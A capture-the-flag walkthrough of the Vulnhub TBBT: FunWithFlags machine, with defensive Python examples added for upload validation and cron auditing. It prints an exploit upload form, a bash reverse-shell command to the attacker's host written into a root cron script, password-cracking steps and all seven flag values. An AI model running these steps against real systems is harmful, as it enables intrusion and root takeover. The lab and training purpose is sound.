
TBBT: FunWithFlags Walkthrough (Vulnhub)

March 18, 2020
As a fan of The Big Bang Theory, and while practicing "social distancing" due to COVID-19, I decided to try a writeup for emaragko's TBBT: FunWithFlags machine on vulnhub.com. My goal was to gain root privileges on the box and identify all 7 flags using only open source tools, without the use of Metasploit.

Port Scanning

When first launching the virtual machine (VM) in VirtualBox, the DHCP-assigned address was displayed on screen before login. Anyone who has used vulnhub before knows this is very helpful, since the first step is always finding where the system landed on the network. With that address in hand, I launched an Nmap scan from my Kali machine, with the service detection argument, to see which services were available for further investigation.
nmap -Pn -sV 192.168.1.105 -p 0-65535 -v

Nmap scan report for 192.168.1.105
Host is up (0.010s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
1337/tcp open  waste?

Anonymous FTP

Reviewing the port scan results, I checked the FTP server on port 21 for anonymous access using the username "anonymous" and was not prompted for a password. This allowed me to search the directories of each user and download files for review:
ftp 192.168.1.105
Connected to 192.168.1.105.
220 (vsFTPd 3.0.3)
Name (192.168.1.105:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls pub
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Mar 03 23:57 amy
drwxr-xr-x    2 ftp      ftp          4096 Mar 04 00:40 bernadette
drwxr-xr-x    2 ftp      ftp          4096 Mar 17 19:38 howard
drwxr-xr-x    2 ftp      ftp          4096 Mar 03 23:57 leonard
drwxr-xr-x    2 ftp      ftp          4096 Mar 05 00:25 penny
drwxr-xr-x    2 ftp      ftp          4096 Mar 03 23:57 raj
-rw-r--r--    1 ftp      ftp        297410 Mar 04 00:09 roomate_agreement.jpg
-rw-r--r--    1 ftp      ftp          3348 Mar 04 00:08 roomate_agreement.txt
drwxr-xr-x    2 ftp      ftp          4096 Mar 04 19:38 sheldon
226 Directory send OK.
ftp>
While digging through each named directory, I found the file "/pub/bernadette/PENNY_README_ASAP.txt". This provided Penny's username and indicated credential reuse on the account. Therefore, I went to the "/pub/penny/" directory, where I found another file called "wifi_password.txt". I had a good laugh reviewing some of the other content on the server, but with a potential set of credentials in hand, it was time to check out the web application hosted on port 80.
root@T460: cat PENNY_README_ASAP.txt
Penny the IT department from my Pharmaceutical company opened you an account in the B2B website.
You need to go there ASAP and learn our drugs for your interview tomorrow.
I dont remember the link, but it is easy you will find it!
Username: penny69
Password: cant post it here as sheldon said. you know the password. you use it everywhere.

Directory Brute Force

The web server's root page provided little information and contained no links for further browsing, although the robots.txt file contained some interesting invalid entries. To help identify a potential attack surface, I performed directory brute-forcing with dirb using the default wordlist (/usr/share/dirb/wordlists/common.txt). This revealed a phpmyadmin portal, a private "Prescription Drug B2B" page where I was able to leverage the previously collected "penny69" credentials, and a WordPress site hosted at "/music/wordpress".
root@T460: dirb http://192.168.1.105
...
---- Scanning URL: http://192.168.1.105/ ----
+ http://192.168.1.105/index.html (CODE:200|SIZE:239)
==> DIRECTORY: http://192.168.1.105/javascript/
==> DIRECTORY: http://192.168.1.105/music/
==> DIRECTORY: http://192.168.1.105/phpmyadmin/
==> DIRECTORY: http://192.168.1.105/private/
+ http://192.168.1.105/robots.txt (CODE:200|SIZE:112)
+ http://192.168.1.105/server-status (CODE:403|SIZE:301)
...

WordPress Scanning

After attempting default credentials on the server's login pages without success, I used WPScan to assess the WordPress site. This revealed an out-of-date plugin, reflex-gallery, at the insecure version 3.1.3:
root@T460: wpscan --url http://192.168.1.105/music/wordpress -e ap
...
[+] reflex-gallery
 | Location: http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/
 | Last Updated: 2019-05-10T16:05:00.000Z
 | [!] The version is out of date, the latest version is 3.1.7
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 3.1.3 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/readme.txt
...

PHP Shell

The reflex-gallery plugin version 3.1.3 has a publicly available exploit that allows arbitrary file upload on the server. The exploit code is freely available on exploit-db (36374), but required some minor modifications to fit this situation. While reading through the code, I manually investigated each URL it referenced and found the first flag at: http://192.168.1.105:1337/wordpress/wp-content/uploads/2015/03/.
FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}
<form method="POST" action="http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2020&Month=03" enctype="multipart/form-data">
<input type="file" name="qqfile"><br>
<input type="submit" name="Submit" value="Pwn!">
</form>
The exploit code created a stand-alone HTML form that sent a POST request to the vulnerable server, ultimately uploading our payload file. This worked because the application failed to properly sanitize the user-supplied input before storing the file. As a result, I was able to upload a PHP reverse shell and force the server to execute it by browsing to http://192.168.1.105/music/wordpress/wp-content/uploads/2020/03/php-reverse-shell.php. The reverse shell was used to gain an initial foothold on the system as the "www-data" user.
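The root cause above is a missing server-side check on what the uploader accepts. The following Python function is an added example (my own code, not the plugin's, which is PHP) of the validation the uploader lacked: a file is stored only if its extension is an allowlisted image type, its leading bytes match that type, and no server-side script extension is hidden earlier in the name, and it is saved under a random name rather than the client-supplied one. The names validate_upload and is_safe_upload are mine.

```python
import os
import re
import secrets

# Image types a gallery uploader should accept, with the magic bytes each must start with.
ALLOWED = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}
# Script extensions that some Apache/PHP handler setups execute even when not last.
SERVER_SIDE = re.compile(r"ph(p\d?|tml|ar)$")

def validate_upload(filename, data):
    """Return a safe server-side filename, or raise ValueError.

    The file must be an allowlisted image by *both* extension and content, so
    'shell.php', 'shell.php.jpg' and a PHP payload named 'shell.jpg' are all refused.
    """
    base = os.path.basename(filename.replace("\\", "/"))  # drop any path component
    if not base or "\x00" in base:
        raise ValueError("invalid filename")
    parts = base.lower().split(".")
    if len(parts) < 2:
        raise ValueError("missing extension")
    ext = parts[-1]
    if ext not in ALLOWED:
        raise ValueError(f"extension .{ext} is not an allowed image type")
    if any(SERVER_SIDE.match(p) for p in parts[1:-1]):
        raise ValueError("double extension with a server-side script type")
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        raise ValueError("content does not match declared image type")
    # Never reuse the client-supplied name: the stored name carries no attacker input.
    return f"{secrets.token_hex(16)}.{ext}"

def is_safe_upload(filename, data):
    """Boolean form of validate_upload for callers that only need accept/reject."""
    try:
        validate_upload(filename, data)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    # Constructed sample inputs: a real JPEG header and the shell name used on this box.
    print(validate_upload("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 12))
    print(is_safe_upload("php-reverse-shell.php", b"<?php echo 1; ?>"))  # False
```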

Privilege Escalation

Once on the system, I used the following command to upgrade the limited shell to an interactive "/bin/bash" session and continued searching the file system:
python3 -c 'import pty;pty.spawn("/bin/bash")'
The home directory looked very similar to the FTP server, with a user folder configured for each person on the show. After further investigation, the "/home/leonard" directory contained a file called "thermostat_set_temp.sh" with read-write-execute permissions for any user on the system. Furthermore, this file was executed by the root user every minute through an automated cron job. To exploit this configuration, a bash reverse shell was echoed into the file and a new listener was set up on my Kali system to capture the incoming shell.
www-data@tbbt:/home$ ls
amy  bernadette  funwithflags  howard  leonard	penny  raj  sheldon

www-data@tbbt:/home$ ls leonard -al
total 24
drwxr-xr-x  2 leonard leonard 4096 Mar  6 00:47 .
drwxr-xr-x 10 root    root    4096 Mar  4 02:33 ..
-rw-------  1 leonard leonard    0 Mar  6 00:47 .bash_history
-rw-r--r--  1 leonard leonard  220 Sep  1  2015 .bash_logout
-rw-r--r--  1 leonard leonard 3771 Sep  1  2015 .bashrc
-rw-r--r--  1 leonard leonard  655 May 16  2017 .profile
-rwxrwxrwx  1 root    root      43 Mar 17 17:58 thermostat_set_temp.sh

www-data@tbbt:/home$ cat /etc/crontab
...
# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/1 *	* * *	root	/home/leonard/thermostat_set_temp.py
...

www-data@tbbt:/home$ echo "bash -i >& /dev/tcp/192.168.1.19/8081 0>&1" > /home/leonard/thermostat_set_temp.sh
Once the cron job triggered and the root shell connected back, I was able to read the following flag at "/root/FLAG-leonard.txt":
root@tbbt: cat /root/FLAG-leonard.txt
                         ____
                        /    \
                       /______\
                          ||
           /~~~~~~~~\     ||    /~~~~~~~~~~~~~~~~\
          /~ () ()  ~\    ||   /~ ()  ()  () ()  ~\
         (_)========(_)   ||  (_)==== ===========(_)
          I|_________|I  _||_  |___________________|
.////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Gongrats!
You have rooted the box! Now you can sit on Sheldons spot!
FLAG-leonard{17fc95224b65286941c54747704acd3e}

I hope you liked it!
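The misconfiguration that gave up root above (a world-writable script in a user's home directory, run by root every minute) is easy to catch in an audit before anyone exploits it. The following Python script is an added example, not from the original post: it parses /etc/crontab-style entries and reports scripts that are world- or group-writable, owned by someone other than root or the job's user, or that live in a directory a non-root user owns. The function names are mine.

```python
import os
import pwd
import stat

def name_for_uid(uid):  # fall back to the number for uids missing from passwd
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:
        return str(uid)

def parse_system_crontab(text):
    """Yield (user, command) from /etc/crontab-style lines: m h dom mon dow user command."""
    for line in text.splitlines():
        fields = line.split(None, 6)
        if len(fields) < 7 or fields[0].startswith("#") or "=" in fields[0]:
            continue  # blank line, comment or environment assignment
        yield fields[5], fields[6]

def first_script_path(command):
    """Return the first absolute path in the command, ignoring the bare '/' of 'cd /'."""
    return next((t for t in command.split() if t.startswith("/") and len(t) > 1), None)

def check_script(path, job_user):
    """Return findings for a script cron runs as job_user; an empty list means it looks fine."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [f"{path}: does not exist (dangling entry)"]
    findings = []
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable ({stat.filemode(st.st_mode)})")
    elif st.st_mode & stat.S_IWGRP:
        findings.append(f"{path}: group-writable ({stat.filemode(st.st_mode)})")
    owner = name_for_uid(st.st_uid)
    if owner not in ("root", job_user):
        findings.append(f"{path}: owned by {owner} but executed as {job_user}")
    # A root-owned script is still replaceable by whoever owns its directory.
    parent_owner = name_for_uid(os.stat(os.path.dirname(path)).st_uid)
    if parent_owner not in ("root", job_user):
        findings.append(f"{path}: parent directory owned by {parent_owner}, not {job_user}")
    return findings

def audit_crontab(text):
    """Collect check_script findings for every job in a system crontab."""
    jobs = ((first_script_path(cmd), user) for user, cmd in parse_system_crontab(text))
    return [f for path, user in jobs if path for f in check_script(path, user)]

if __name__ == "__main__" and os.path.exists("/etc/crontab"):  # audit the live system
    with open("/etc/crontab") as fh:
        print(*audit_crontab(fh.read()), sep="\n")
```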

Amy Flag

Inside the "/home/amy" directory, a Linux binary called "secretdiary" was found. Running the strings command on the file revealed the password and flag values. I then went back and executed the file, entering the proper information, for additional verification:
www-data@tbbt:/home/amy$ ./secretdiary
Enter your username:
amy
Enter your password:
-------

Login Success!

Soon I will be adding my secrets here..
FLAG-amy{60263777358690b90e8dbe8fea6943c9}

Penny Flag

A hidden file was discovered at "/home/penny/.FLAG.penny.txt" that exposed a base64 encoded string. The following command was used to decode the string and recover the flag:
www-data@tbbt:/home/penny$ cat .FLAG.penny.txt|base64 -d && echo -e "\n"
FLAG-penny{dace52bdb2a0b3f899dfb3423a992b25}

Bernadette Flag

While executing commands as the "www-data" user and looking for privilege escalation opportunities, I dug through the web application configuration files. This revealed database credentials for the "bigpharmacorp" user in "/var/www/html/private/db_config.php":
www-data@tbbt:/var/www/html/private$ cat db_config.php
<?php
// Create connection
$DBUSER = 'bigpharmacorp';
$DBPASS = '-------';

$con=mysqli_connect("127.0.0.1",$DBUSER,$DBPASS,"bigpharmacorp");
...
This was used to access "http://192.168.1.105/phpmyadmin/" and search the bigpharmacorp > users table. The Bernadette flag was found in the "bernadette" user's description field, as shown below. I used Hashcat against the stored password hashes to recover additional user accounts for this site; however, they yielded no additional flags or access.

Raj Flag

Following the same path used to identify the Bernadette flag, I read the WordPress configuration file in "/var/www/html/music/wordpress/" to reveal another set of database credentials:
www-data@tbbt:/var/www/html/music/wordpress$ cat wp-config.php
...
/** The name of the database for WordPress */
define( 'DB_NAME', 'footprintsonthemoon' );

/** MySQL database username */
define( 'DB_USER', 'footprintsonthemoon' );

/** MySQL database password */
define( 'DB_PASSWORD', '---------' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
...
Logging into the phpmyadmin site with these credentials provided access to the footprintsonthemoon database, where a private WordPress post containing the Raj flag was found. Note: I am assuming the name listed on the flag is a typo.

Howard Flag

This was the hardest of the 7 flags to find and definitely required some persistence! During my initial look at the anonymous FTP server, a password-protected zip file was found at "/pub/howard/super_secret_nasa_stuff_here.zip". Unable to guess the password, I set it aside, hoping to find it elsewhere on the system.
I had rooted the box and found the other 6 flags, but was out of luck on this one. I turned to fcrackzip to brute-force the password using the rockyou.txt word list, and recovered the "marsroversketch.jpg" file after only a few minutes.
root@T460: fcrackzip -u -D -p rockyou.txt super_secret_nasa_stuff_here.zip
PASSWORD FOUND!!!!: pw == ------  
To my surprise, the picture provided no indication of a flag. However, it felt like there was still more to find. I spent some time researching steganography and came across stegcracker, a Python-based utility that brute-forces the passphrase protecting data hidden in an image file. I tried this against the unzipped image, again using the rockyou.txt list, to recover the final flag!
root@T460: stegcracker marsroversketch.jpg rockyou.txt
StegCracker 2.0.7 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2020 - Luke Paris (Paradoxis)

Counting lines in wordlist..
Attacking file 'marsroversketch.jpg' with wordlist 'rockyou.txt'..
Successfully cracked file with password: --------
Tried 51285 passwords
Your file has been written to: marsroversketch.jpg.out

root@T460: cat marsroversketch.jpg.out
FLAG-howard{b3d1baf22e07874bf744ad7947519bf4}


References and Additional Resources:

https://www.vulnhub.com/entry/tbbt-funwithflags,437/
https://www.exploit-db.com/exploits/36374
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://github.com/Paradoxis/StegCracker